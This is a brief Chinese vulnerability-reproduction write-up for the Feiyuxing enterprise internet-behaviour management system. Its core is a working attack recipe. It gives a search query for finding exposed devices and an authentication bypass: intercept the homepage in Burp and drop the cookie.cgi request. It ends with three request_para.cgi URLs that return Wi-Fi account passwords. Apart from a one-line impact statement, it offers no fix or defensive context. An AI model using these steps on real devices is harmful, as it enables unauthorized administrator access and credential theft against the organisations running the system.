一：漏洞描述

飞鱼星 企业级智能上网行为管理系统 存在权限绕过以及信息泄露漏洞，可以获取管理员权限以及用户密码

二: 漏洞影响

飞鱼星 企业级智能上网行为管理系统

三: 漏洞复现

title=“飞鱼星企业级智能上网行为管理系统”
访问主页使用Burp抓包

http://xxx.xxx.xxx.xxx/home/index.html

其中使用Burp Durp 掉 cookie.cgi 请求包

四：成功越权后台，其中还存在敏感信息泄露

/request_para.cgi?parameter=wifi_info      #获取ALL WIFI账号密码
/request_para.cgi?parameter=wifi_get_5g_host #获取5GWIFI账号密码
/request_para.cgi?parameter=wifi_get_2g_host #获取2GWIFI账号密码